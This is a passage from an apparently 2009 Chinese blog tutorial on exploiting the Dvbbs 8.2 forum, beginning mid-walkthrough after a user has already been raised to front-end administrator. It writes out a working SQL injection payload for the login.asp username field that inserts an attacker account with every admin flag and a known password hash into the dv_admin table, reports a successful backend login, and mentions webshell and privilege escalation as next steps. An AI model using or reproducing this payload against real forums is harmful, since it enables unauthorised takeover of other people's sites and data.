dvbbs 8.2 论坛漏洞到webshell SQL版

2009年8月14日星期五 | | |





我们可以看到登陆提示为"本论坛不存在该用户名"这个就说明我们所提升的帐户"hxhack"已经为管理员了。

现在我们已经是前台管理员了。

那么怎样才能让我们的帐户具有后台权限呢?我们继续来到login.asp这个登陆页面。在用户名处写入"hxhack';insert into dv_admin (username,password,flag,adduser) values


('hxhack','a5258dfb597d7a1a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,


24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','hxhack')--"其中的"a5258dfb597d7a1a"是"hxhack"的MD5加密后的值,也就是说我们这里提升为后台管理权限的帐户的后台管理密码为"hxhack"。之后我们看看能否登陆后台,哈哈RP还行,成功了如图




接来呢就是看看能否拿到webshell甚至提权了。这里我就不搞了
好了其实这个漏洞并没有什么 ,至于ACCESS这个数据库的利用比较麻烦(本人比较懒就不搞了)!希望这篇菜鸟级的文章能给你一点收获。

我的QQ空间
TC模板標簽說明及漢化
TC模板標簽說明[##_title_##] 日志標題 [后臺可設置][##_page_po...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]